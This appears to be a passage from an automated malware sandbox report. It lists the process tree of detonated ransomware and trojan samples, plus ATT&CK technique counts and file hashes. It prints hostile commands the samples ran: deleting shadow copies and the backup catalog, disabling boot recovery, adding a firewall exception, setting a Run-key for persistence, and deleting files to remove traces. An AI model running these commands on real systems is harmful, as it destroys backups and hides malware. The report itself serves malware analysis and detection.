C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\users\public\desktop\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}4⤵PID:8156
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}4⤵PID:4052
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "F:\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}4⤵PID:8044
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"4⤵PID:4988
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet5⤵
- Interacts with shadow copies
PID:7100
-
-
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete5⤵PID:5584
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures5⤵
- Modifies boot configuration data using bcdedit
PID:4596
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled no5⤵
- Modifies boot configuration data using bcdedit
PID:8092
-
-
C:\Windows\system32\wbadmin.exewbadmin delete catalog -quiet5⤵
- Deletes backup catalog
PID:6396
-
-
-
-
C:\Users\Admin\Desktop\00481\HEUR-Trojan-Ransom.Win32.PolyRansom.gen-8189efde1d4ae21dee178ed824c3c7d483d62fe678f10168224e8a08d653c8cf.exeHEUR-Trojan-Ransom.Win32.PolyRansom.gen-8189efde1d4ae21dee178ed824c3c7d483d62fe678f10168224e8a08d653c8cf.exe3⤵PID:1684
-
-
C:\Users\Admin\Desktop\00481\HEUR-Trojan-Ransom.Win32.Shade.pef-5ca2121b8b5edb7d1de8afd934299cc83900dd2b4ba80d95b1693b11d06155fd.exeHEUR-Trojan-Ransom.Win32.Shade.pef-5ca2121b8b5edb7d1de8afd934299cc83900dd2b4ba80d95b1693b11d06155fd.exe3⤵PID:5076
-
-
C:\Users\Admin\Desktop\00481\HEUR-Trojan.MSIL.Crypt.gen-0b93588e6462f62c417aa4dec3f21768763668d3b4a7962ce4579d0b3d06d092.exeHEUR-Trojan.MSIL.Crypt.gen-0b93588e6462f62c417aa4dec3f21768763668d3b4a7962ce4579d0b3d06d092.exe3⤵PID:452
-
-
C:\Users\Admin\Desktop\00481\HEUR-Trojan.MSIL.Crypt.gen-10fc4ad81b9217bbdb65bcceed6d0db2694be2fa37d18ebd63d22e20c7ea87e5.exeHEUR-Trojan.MSIL.Crypt.gen-10fc4ad81b9217bbdb65bcceed6d0db2694be2fa37d18ebd63d22e20c7ea87e5.exe3⤵PID:4860
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4860 -s 10604⤵
- Program crash
PID:6044
-
-
-
C:\Users\Admin\Desktop\00481\HEUR-Trojan.MSIL.Crypt.gen-110355960af2b279d8f8d3213ec402ed1f6f039d104cd87ea9463e3cd3e378c0.exeHEUR-Trojan.MSIL.Crypt.gen-110355960af2b279d8f8d3213ec402ed1f6f039d104cd87ea9463e3cd3e378c0.exe3⤵PID:5320
-
-
C:\Users\Admin\Desktop\00481\HEUR-Trojan.MSIL.Crypt.gen-1b18ce7b513855676ef76c17fcf6b6d492f20e197fae1090e722b43f7f5ff2df.exeHEUR-Trojan.MSIL.Crypt.gen-1b18ce7b513855676ef76c17fcf6b6d492f20e197fae1090e722b43f7f5ff2df.exe3⤵PID:5316
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\SetpMoonFile.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\SetpMoonFile.exe"4⤵PID:4648
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\kunzhang-game.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\kunzhang-game.exe"4⤵PID:5468
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\kunzhang-game.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\kunzhang-game.exe" -q5⤵PID:6924
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6924 -s 8486⤵
- Program crash
PID:7144
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\update.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\update.exe"4⤵PID:4696
-
-
-
C:\Users\Admin\Desktop\00481\HEUR-Trojan.MSIL.Crypt.gen-1cd3ab361978536d255091f7ec0cc8721ae74a8e80f02738c9d7991d25551bd7.exeHEUR-Trojan.MSIL.Crypt.gen-1cd3ab361978536d255091f7ec0cc8721ae74a8e80f02738c9d7991d25551bd7.exe3⤵PID:5288
-
C:\Users\Admin\AppData\Local\Temp\WindowsServices.exe"C:\Users\Admin\AppData\Local\Temp\WindowsServices.exe"4⤵PID:6492
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\WindowsServices.exe" "WindowsServices.exe" ENABLE5⤵
- Modifies Windows Firewall
PID:804
-
-
-
-
C:\Users\Admin\Desktop\00481\HEUR-Trojan.MSIL.Crypt.gen-33ca31452fa88581eb327146aed3c6c18fff650c575b2e2d29024f3b04eb4a80.exeHEUR-Trojan.MSIL.Crypt.gen-33ca31452fa88581eb327146aed3c6c18fff650c575b2e2d29024f3b04eb4a80.exe3⤵PID:5240
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5240 -s 16684⤵
- Program crash
PID:5528
-
-
-
C:\Users\Admin\Desktop\00481\HEUR-Trojan.MSIL.Crypt.gen-34eea6efe1c6bf1b1d7d6c92c4c5897564975e63dda3454a68ac4e19f44b976a.exeHEUR-Trojan.MSIL.Crypt.gen-34eea6efe1c6bf1b1d7d6c92c4c5897564975e63dda3454a68ac4e19f44b976a.exe3⤵PID:6088
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6088 -s 16804⤵
- Program crash
PID:3108
-
-
-
C:\Users\Admin\Desktop\00481\HEUR-Trojan.MSIL.Crypt.gen-384d3857386e2564916121f7ef1bd50075eae468ab8f0aeac346d6f9bc2e58e2.exeHEUR-Trojan.MSIL.Crypt.gen-384d3857386e2564916121f7ef1bd50075eae468ab8f0aeac346d6f9bc2e58e2.exe3⤵PID:60
-
-
C:\Users\Admin\Desktop\00481\HEUR-Trojan.MSIL.Crypt.gen-4939fd9f7a6efe903622f1eba7bf9b23c2b978e1c2b907bdf0192373151bc511.exeHEUR-Trojan.MSIL.Crypt.gen-4939fd9f7a6efe903622f1eba7bf9b23c2b978e1c2b907bdf0192373151bc511.exe3⤵PID:3156
-
C:\Users\Admin\Desktop\00481\HEUR-Trojan.MSIL.Crypt.gen-4939fd9f7a6efe903622f1eba7bf9b23c2b978e1c2b907bdf0192373151bc511.exe"C:\Users\Admin\Desktop\00481\HEUR-Trojan.MSIL.Crypt.gen-4939fd9f7a6efe903622f1eba7bf9b23c2b978e1c2b907bdf0192373151bc511.exe"4⤵PID:6508
-
-
C:\Users\Admin\Desktop\00481\HEUR-Trojan.MSIL.Crypt.gen-4939fd9f7a6efe903622f1eba7bf9b23c2b978e1c2b907bdf0192373151bc511.exe"C:\Users\Admin\Desktop\00481\HEUR-Trojan.MSIL.Crypt.gen-4939fd9f7a6efe903622f1eba7bf9b23c2b978e1c2b907bdf0192373151bc511.exe"4⤵PID:304
-
-
C:\Users\Admin\Desktop\00481\HEUR-Trojan.MSIL.Crypt.gen-4939fd9f7a6efe903622f1eba7bf9b23c2b978e1c2b907bdf0192373151bc511.exe"C:\Users\Admin\Desktop\00481\HEUR-Trojan.MSIL.Crypt.gen-4939fd9f7a6efe903622f1eba7bf9b23c2b978e1c2b907bdf0192373151bc511.exe"4⤵PID:972
-
-
-
C:\Users\Admin\Desktop\00481\HEUR-Trojan.MSIL.Crypt.gen-52ec6ee1f7796fd12c2afc3b2927fe586df55263ce52ec081d7588d11ebe6f60.exeHEUR-Trojan.MSIL.Crypt.gen-52ec6ee1f7796fd12c2afc3b2927fe586df55263ce52ec081d7588d11ebe6f60.exe3⤵PID:6020
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 9844⤵PID:6672
-
-
-
C:\Users\Admin\Desktop\00481\HEUR-Trojan.MSIL.Crypt.gen-5b7c0b52e450e2ebdc2b78663c9f998e0009883c48ef9a4e88cdd51fa6a7bd39.exeHEUR-Trojan.MSIL.Crypt.gen-5b7c0b52e450e2ebdc2b78663c9f998e0009883c48ef9a4e88cdd51fa6a7bd39.exe3⤵PID:6644
-
C:\Users\Admin\Desktop\00481\HEUR-Trojan.MSIL.Crypt.gen-5b7c0b52e450e2ebdc2b78663c9f998e0009883c48ef9a4e88cdd51fa6a7bd39.exeC:\Users\Admin\Desktop\00481\HEUR-Trojan.MSIL.Crypt.gen-5b7c0b52e450e2ebdc2b78663c9f998e0009883c48ef9a4e88cdd51fa6a7bd39.exe4⤵PID:7044
-
-
-
C:\Users\Admin\Desktop\00481\HEUR-Trojan.MSIL.Crypt.gen-6f32a3abb3397719f59e78eeef85c07c07f167c3d12a8467aad65b1450389fae.exeHEUR-Trojan.MSIL.Crypt.gen-6f32a3abb3397719f59e78eeef85c07c07f167c3d12a8467aad65b1450389fae.exe3⤵PID:7160
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7160 -s 8764⤵
- Program crash
PID:6836
-
-
-
C:\Users\Admin\Desktop\00481\HEUR-Trojan.MSIL.Crypt.gen-7b685e14f9283f373682bc559203fb69b36412580d1951b84f1922538e9899f0.exeHEUR-Trojan.MSIL.Crypt.gen-7b685e14f9283f373682bc559203fb69b36412580d1951b84f1922538e9899f0.exe3⤵PID:6104
-
-
C:\Users\Admin\Desktop\00481\HEUR-Trojan.MSIL.Crypt.gen-8ccff7fe69502a1c7a107ba8a7906ae8cda676413fc9ac9c242c9244021a1582.exeHEUR-Trojan.MSIL.Crypt.gen-8ccff7fe69502a1c7a107ba8a7906ae8cda676413fc9ac9c242c9244021a1582.exe3⤵PID:6292
-
-
C:\Users\Admin\Desktop\00481\HEUR-Trojan.MSIL.Crypt.gen-c41be31a7039b478f8b5e5858672fe7568e3aae49c8984154fbd17ade039fc87.exeHEUR-Trojan.MSIL.Crypt.gen-c41be31a7039b478f8b5e5858672fe7568e3aae49c8984154fbd17ade039fc87.exe3⤵PID:2644
-
-
C:\Users\Admin\Desktop\00481\HEUR-Trojan.MSIL.Crypt.gen-f663110aed2d5fdecf27fba39beabc90e72397d4fd661f381d1767aac3cf4438.exeHEUR-Trojan.MSIL.Crypt.gen-f663110aed2d5fdecf27fba39beabc90e72397d4fd661f381d1767aac3cf4438.exe3⤵PID:6940
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6940 -s 16724⤵
- Program crash
PID:6008
-
-
-
C:\Users\Admin\Desktop\00481\HEUR-Trojan.MSIL.Crypt.vho-45c888a043acd745d8a25044c2b336d09f68ca059eb392e3008c13240cfd2539.exeHEUR-Trojan.MSIL.Crypt.vho-45c888a043acd745d8a25044c2b336d09f68ca059eb392e3008c13240cfd2539.exe3⤵PID:7120
-
-
C:\Users\Admin\Desktop\00481\HEUR-Trojan.MSIL.Cryptos.gen-129727517be620d25c789c99145fed6efa74406ebc4409c0fdd9bb603512517c.exeHEUR-Trojan.MSIL.Cryptos.gen-129727517be620d25c789c99145fed6efa74406ebc4409c0fdd9bb603512517c.exe3⤵PID:6344
-
-
C:\Users\Admin\Desktop\00481\HEUR-Trojan.MSIL.Cryptos.gen-d61db0b3a561443ce18228eef31816793a9f1727d7744bab25d7e60960db5a88.exeHEUR-Trojan.MSIL.Cryptos.gen-d61db0b3a561443ce18228eef31816793a9f1727d7744bab25d7e60960db5a88.exe3⤵PID:5400
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-NetConnection -TraceRoute youtube.com4⤵PID:6684
-
-
-
C:\Users\Admin\Desktop\00481\HEUR-Trojan.MSIL.DelShad.gen-2cff45822710dd346e270970a3b780505f7f781f9982bf331bdd411802516d41.exeHEUR-Trojan.MSIL.DelShad.gen-2cff45822710dd346e270970a3b780505f7f781f9982bf331bdd411802516d41.exe3⤵PID:1112
-
C:\ProgramData\pay.exe"C:\ProgramData\pay.exe"4⤵PID:7628
-
C:\Windows\SysWOW64\notepad.exenotepad.exe5⤵PID:7748
-
-
-
-
C:\Users\Admin\Desktop\00481\Trojan-Ransom.Win32.Blocker.cgth-0d409dfd5a0460730a4be2f411160142085b959ae5758f111235ff68cc71bd27.exeTrojan-Ransom.Win32.Blocker.cgth-0d409dfd5a0460730a4be2f411160142085b959ae5758f111235ff68cc71bd27.exe3⤵PID:4140
-
C:\Users\Admin\AppData\Local\Temp\eidolon.exe"C:\Users\Admin\AppData\Local\Temp\eidolon.exe"4⤵PID:6576
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Windows\temp\tttdelzzz.bat" "4⤵PID:884
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Windows\temp\tttbrozzz.bat" "4⤵PID:6648
-
C:\Users\Admin\AppData\Local\Temp\USBServers32.exe"C:\Users\Admin\AppData\Local\Temp\USBServers32.exe"5⤵PID:4344
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\windows\currentVersion\run /v USBServers32 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\USBServers32.exe" /f6⤵PID:664
-
C:\Windows\SysWOW64\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\windows\currentVersion\run /v USBServers32 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\USBServers32.exe" /f7⤵PID:5908
-
-
-
-
-
-
C:\Users\Admin\Desktop\00481\Trojan-Ransom.Win32.Blocker.iyjg-d0e537cf4d3e233be10904e678adaa817e02a91b6deacc812dede1f0bcb655b7.exeTrojan-Ransom.Win32.Blocker.iyjg-d0e537cf4d3e233be10904e678adaa817e02a91b6deacc812dede1f0bcb655b7.exe3⤵PID:5192
-
-
C:\Users\Admin\Desktop\00481\Trojan-Ransom.Win32.Blocker.jgb-5325e5ce8465718d8c6ef3bcc4e32f35bf4dff88cb415bde87e45209caefc840.exeTrojan-Ransom.Win32.Blocker.jgb-5325e5ce8465718d8c6ef3bcc4e32f35bf4dff88cb415bde87e45209caefc840.exe3⤵PID:5368
-
C:\Users\Admin\AppData\Local\Temp\Rar$EX7.src777\achsv.exe\\.\C:\Users\Admin\AppData\Local\Temp\Rar$EX7.src777\achsv.exe4⤵PID:7900
-
C:\Users\Admin\AppData\Local\Temp\Rar$EX7.src777\COM7.EXE\\.\C:\Users\Admin\AppData\Local\Temp\Rar$EX7.src777\COM7.EXE5⤵PID:6064
-
-
-
C:\Users\Admin\AppData\Local\Temp\Rar$EX7.src777\COM7.EXE\\.\C:\Users\Admin\AppData\Local\Temp\Rar$EX7.src777\COM7.EXE4⤵PID:7408
-
C:\Users\Admin\AppData\Local\Temp\Rar$EX7.src777\achsv.exe\\.\C:\Users\Admin\AppData\Local\Temp\Rar$EX7.src777\achsv.exe5⤵PID:7544
-
-
-
-
C:\Users\Admin\Desktop\00481\Trojan-Ransom.Win32.Blocker.mgn-bfbbb3ef2e95d79700d7b2154fe6496de70b2448cc0438abdbf58cc1ac4c666a.exeTrojan-Ransom.Win32.Blocker.mgn-bfbbb3ef2e95d79700d7b2154fe6496de70b2448cc0438abdbf58cc1ac4c666a.exe3⤵PID:3996
-
C:\Users\Admin\AppData\Local\Temp\Rar$EX7.sr77\ashcv.exe\\.\C:\Users\Admin\AppData\Local\Temp\Rar$EX7.sr77\ashcv.exe4⤵PID:8172
-
C:\Users\Admin\AppData\Local\Temp\Rar$EX7.sr77\COM7.EXE\\.\C:\Users\Admin\AppData\Local\Temp\Rar$EX7.sr77\COM7.EXE5⤵PID:5300
-
-
-
C:\Users\Admin\AppData\Local\Temp\Rar$EX7.sr77\COM7.EXE\\.\C:\Users\Admin\AppData\Local\Temp\Rar$EX7.sr77\COM7.EXE4⤵PID:7084
-
C:\Users\Admin\AppData\Local\Temp\Rar$EX7.sr77\ashcv.exe\\.\C:\Users\Admin\AppData\Local\Temp\Rar$EX7.sr77\ashcv.exe5⤵PID:7432
-
-
-
-
C:\Users\Admin\Desktop\00481\Trojan-Ransom.Win32.Blocker.ncvy-8874e396ecea1f29603f93e4ad8d5ed38da2470ff9f9e18a37484d63842bab40.exeTrojan-Ransom.Win32.Blocker.ncvy-8874e396ecea1f29603f93e4ad8d5ed38da2470ff9f9e18a37484d63842bab40.exe3⤵PID:3104
-
-
C:\Users\Admin\Desktop\00481\Trojan-Ransom.Win32.Blocker.ndsv-7f8cb5304e6bbf126c58c71a05d7d63fe383f07f62eeb3e096bb31e4130c337b.exeTrojan-Ransom.Win32.Blocker.ndsv-7f8cb5304e6bbf126c58c71a05d7d63fe383f07f62eeb3e096bb31e4130c337b.exe3⤵PID:7100
-
-
C:\Users\Admin\Desktop\00481\Trojan-Ransom.Win32.Cryptodef.aoo-76d246cc31edcab26cf77f36d44a06e89eb060f2a339c2bf2e3af16d4b09d9a1.exeTrojan-Ransom.Win32.Cryptodef.aoo-76d246cc31edcab26cf77f36d44a06e89eb060f2a339c2bf2e3af16d4b09d9a1.exe3⤵PID:1064
-
-
C:\Users\Admin\Desktop\00481\Trojan-Ransom.Win32.Cryptodef.aoo-78420d1cbfc991c7e1b8481f516e04a6067a261194cfaff6defa9c2c8e676ac9.exeTrojan-Ransom.Win32.Cryptodef.aoo-78420d1cbfc991c7e1b8481f516e04a6067a261194cfaff6defa9c2c8e676ac9.exe3⤵PID:5780
-
-
C:\Users\Admin\Desktop\00481\Trojan-Ransom.Win32.Cryptodef.aoo-7a88430dba2ab076358b34a3d7f7d46b16868c13e696f08d6104de2530268814.exeTrojan-Ransom.Win32.Cryptodef.aoo-7a88430dba2ab076358b34a3d7f7d46b16868c13e696f08d6104de2530268814.exe3⤵PID:7968
-
-
C:\Users\Admin\Desktop\00481\Trojan-Ransom.Win32.Cryptodef.aoo-ad01f0eaee4dea2365b6c074be77d19866d8999f339a7181ce09959c07b64bc6.exeTrojan-Ransom.Win32.Cryptodef.aoo-ad01f0eaee4dea2365b6c074be77d19866d8999f339a7181ce09959c07b64bc6.exe3⤵PID:1204
-
-
C:\Users\Admin\Desktop\00481\Trojan-Ransom.Win32.Encoder.nxo-c52541456f38623519a5c208b50ff8935c4f0edf5cf9cbbc5199c1c5d8e4852f.exeTrojan-Ransom.Win32.Encoder.nxo-c52541456f38623519a5c208b50ff8935c4f0edf5cf9cbbc5199c1c5d8e4852f.exe3⤵PID:3700
-
-
C:\Users\Admin\Desktop\00481\Trojan-Ransom.Win32.Encoder.nxu-d4045a8a405bace64ecd15fa32c8ef301cf337f481a347359b23373d86a3f914.exeTrojan-Ransom.Win32.Encoder.nxu-d4045a8a405bace64ecd15fa32c8ef301cf337f481a347359b23373d86a3f914.exe3⤵PID:4504
-
-
C:\Users\Admin\Desktop\00481\Trojan-Ransom.Win32.Encoder.nxw-eb4986ba481fa4c8d88159ae1b9c729d5f72478f7998414d13a0dd7625b67f0a.exeTrojan-Ransom.Win32.Encoder.nxw-eb4986ba481fa4c8d88159ae1b9c729d5f72478f7998414d13a0dd7625b67f0a.exe3⤵PID:4772
-
-
C:\Users\Admin\Desktop\00481\Trojan-Ransom.Win32.Encoder.nxy-18151fda7582a9abf7c0810e47d20327c7a6b59ef51d2b6e2beb3d88902d0524.exeTrojan-Ransom.Win32.Encoder.nxy-18151fda7582a9abf7c0810e47d20327c7a6b59ef51d2b6e2beb3d88902d0524.exe3⤵PID:6320
-
-
C:\Users\Admin\Desktop\00481\Trojan-Ransom.Win32.Encoder.nya-cd8617cced925e48e71c1e4cec9e7210c0ee7c4f4abd05e9a7b149cf9313ddff.exeTrojan-Ransom.Win32.Encoder.nya-cd8617cced925e48e71c1e4cec9e7210c0ee7c4f4abd05e9a7b149cf9313ddff.exe3⤵PID:5200
-
C:\Windows\SYSTEM32\cmd.execmd.exe /C Del /f /q "C:\Users\Admin\Desktop\00481\Trojan-Ransom.Win32.Encoder.nya-cd8617cced925e48e71c1e4cec9e7210c0ee7c4f4abd05e9a7b149cf9313ddff.exe"4⤵PID:7488
-
-
-
C:\Users\Admin\Desktop\00481\Trojan-Ransom.Win32.Encoder.nzf-b3e82b43750c7d0833f69abd3d31751c9e8face5063573946f61abbdda513eb8.exeTrojan-Ransom.Win32.Encoder.nzf-b3e82b43750c7d0833f69abd3d31751c9e8face5063573946f61abbdda513eb8.exe3⤵PID:5964
-
-
C:\Users\Admin\Desktop\00481\Trojan-Ransom.Win32.Encoder.nzg-b237c7e4b66392b1a73b505d1813ceac4f957c9ba1fdd2e9c5d3e33f2ed04919.exeTrojan-Ransom.Win32.Encoder.nzg-b237c7e4b66392b1a73b505d1813ceac4f957c9ba1fdd2e9c5d3e33f2ed04919.exe3⤵PID:5576
-
-
C:\Users\Admin\Desktop\00481\Trojan-Ransom.Win32.Foreign.okhm-00e89eddc18f9bbc93c4c8b204ab3010bbb62a4f237a823e7926c4b1cec1067b.exeTrojan-Ransom.Win32.Foreign.okhm-00e89eddc18f9bbc93c4c8b204ab3010bbb62a4f237a823e7926c4b1cec1067b.exe3⤵PID:2020
-
-
C:\Users\Admin\Desktop\00481\Trojan-Ransom.Win32.GenericCryptor.cys-e1ad31d922b47019b5c0d1668e53171c3a9a36d0a3d423ef9627d56297ef9712.exeTrojan-Ransom.Win32.GenericCryptor.cys-e1ad31d922b47019b5c0d1668e53171c3a9a36d0a3d423ef9627d56297ef9712.exe3⤵PID:5584
-
-
C:\Users\Admin\Desktop\00481\Trojan-Ransom.Win32.GenericCryptor.czo-6a7607650d8cf39ab2dd4b82fd566fbfb6f38532c3df9cf114e5d1e0ea70016b.exeTrojan-Ransom.Win32.GenericCryptor.czo-6a7607650d8cf39ab2dd4b82fd566fbfb6f38532c3df9cf114e5d1e0ea70016b.exe3⤵PID:5000
-
-
C:\Users\Admin\Desktop\00481\Trojan-Ransom.Win32.GenericCryptor.czx-ec35ddfeedc9de271465beb6fec6318851d92816909f9acee1705f38a4b74dd2.exeTrojan-Ransom.Win32.GenericCryptor.czx-ec35ddfeedc9de271465beb6fec6318851d92816909f9acee1705f38a4b74dd2.exe3⤵PID:5400
-
-
C:\Users\Admin\Desktop\00481\Trojan-Ransom.Win32.Gimemo.cdqu-e3f1c121464ec4740e6658858fcb8bfc868ed884acf7e14b929cb7765720c585.exeTrojan-Ransom.Win32.Gimemo.cdqu-e3f1c121464ec4740e6658858fcb8bfc868ed884acf7e14b929cb7765720c585.exe3⤵PID:6328
-
-
C:\Users\Admin\Desktop\00481\Trojan-Ransom.Win32.PornoBlocker.ajrm-0de12600427213cecabba57d9a106c53a37407eb29349e5425a524f5fd4f2403.exeTrojan-Ransom.Win32.PornoBlocker.ajrm-0de12600427213cecabba57d9a106c53a37407eb29349e5425a524f5fd4f2403.exe3⤵PID:6204
-
-
C:\Users\Admin\Desktop\00481\Trojan-Ransom.Win32.Scatter.av-eade3a7839c2c5b81c1d8c94020169e9690fce47eae30748a7f55fc2282cb33a.exeTrojan-Ransom.Win32.Scatter.av-eade3a7839c2c5b81c1d8c94020169e9690fce47eae30748a7f55fc2282cb33a.exe3⤵PID:2876
-
-
C:\Users\Admin\Desktop\00481\Trojan.MSIL.Crypt.ebhp-df07d4476a571e206b644bcd008991b0be5f0c420b61318d28fc1b2b86804767.exeTrojan.MSIL.Crypt.ebhp-df07d4476a571e206b644bcd008991b0be5f0c420b61318d28fc1b2b86804767.exe3⤵PID:1048
-
-
C:\Users\Admin\Desktop\00481\Trojan.MSIL.Crypt.fpwv-defd8a8cd6001eecad702efe05cfd1bb5ae7e6d0d93bb80b98e74b9a1e6c22aa.exeTrojan.MSIL.Crypt.fpwv-defd8a8cd6001eecad702efe05cfd1bb5ae7e6d0d93bb80b98e74b9a1e6c22aa.exe3⤵PID:1560
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3208 -
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /12⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4536
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 3236 -ip 32361⤵PID:5780
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4860 -ip 48601⤵PID:5564
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:1496
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 7160 -ip 71601⤵PID:6620
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 6924 -ip 69241⤵PID:7076
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:6236
-
C:\Windows\SysWOW64\Accessibility.exeC:\Windows\SysWOW64\Accessibility.exe -s1⤵PID:6596
-
C:\Windows\SysWOW64\cmd.execmd /c choice /t 10 /d y & attrib -h "C:\Windows\SysWOW64\Accessibility.exe" & del "C:\Windows\SysWOW64\Accessibility.exe"2⤵PID:2448
-
C:\Windows\SysWOW64\choice.exechoice /t 10 /d y3⤵PID:6472
-
-
C:\Windows\SysWOW64\attrib.exeattrib -h "C:\Windows\SysWOW64\Accessibility.exe"3⤵
- Views/modifies file attributes
PID:8100
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵PID:1916
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 6088 -ip 60881⤵PID:7532
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5240 -ip 52401⤵PID:8080
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 6940 -ip 69401⤵PID:7724
-
C:\Windows\SysWOW64\werfault.exewerfault.exe /h /shared Global\096f6b6434854fcfb83ef041f5fca5f2 /t 6716 /p 51921⤵PID:5004
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵PID:7664
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:5164
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:7576
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵PID:752
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵PID:4196
-
C:\Windows\SysWOW64\werfault.exewerfault.exe /h /shared Global\b2c44d60b8dc43af8a4d39b78b5157ac /t 3232 /p 81561⤵PID:6476
-
C:\Windows\SysWOW64\werfault.exewerfault.exe /h /shared Global\e62d8866a04c49989cf12a408d7c89c2 /t 4920 /p 52801⤵PID:2068
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
3PowerShell
1Scheduled Task/Job
1Scheduled Task
1Windows Management Instrumentation
1Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Direct Volume Access
1File and Directory Permissions Modification
1Hide Artifacts
1Hidden Files and Directories
1Impair Defenses
1Disable or Modify System Firewall
1Indicator Removal
4File Deletion
4Modify Registry
3Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\AutoRun.exe.id[809AF621-3240].[[email protected]].eking
Filesize11.1MB
MD59d314e4a4cfa4c79a5f0083a9cf5875c
SHA1f22580a92ccce57bcf4d8ec2aac8ad18cdb6ac9d
SHA2565426c3d314405f9e39a940cf60f8f9a4e5a7c2cdc87cf913afedc51b83c9283b
SHA512dcfff63d9b74c1c2b94ef547bbca21e77732c9db7f069bc81399dd8c81b1a72fe05148c7ed0b1614522de1dcd0f220e7a899867a60d6d9f2df85bd2b9bdff168
-
Filesize
1.8MB
MD5fc6a1999bfa0b1d4b08b1df3ae39efca
SHA1b050ebdc9ca73b67734be9d019e31e40e6a0bd4d
SHA2563a6b6b51c08200ea3d4ea1a6639c4d6d1ebeb423b0db57ebe5b83db9c40af568
SHA5125ba7cca557ed51925fe413661566b79f4eefe7fc23bb2d22b5d40a5859675160a44bf72eaa8dfe8cdc23d801eb1e2dd50beec3c478c43ce757fcc2f916926313
-
Filesize
1.8MB
MD5b274a830fdc17e991327e1ac0f1926bc
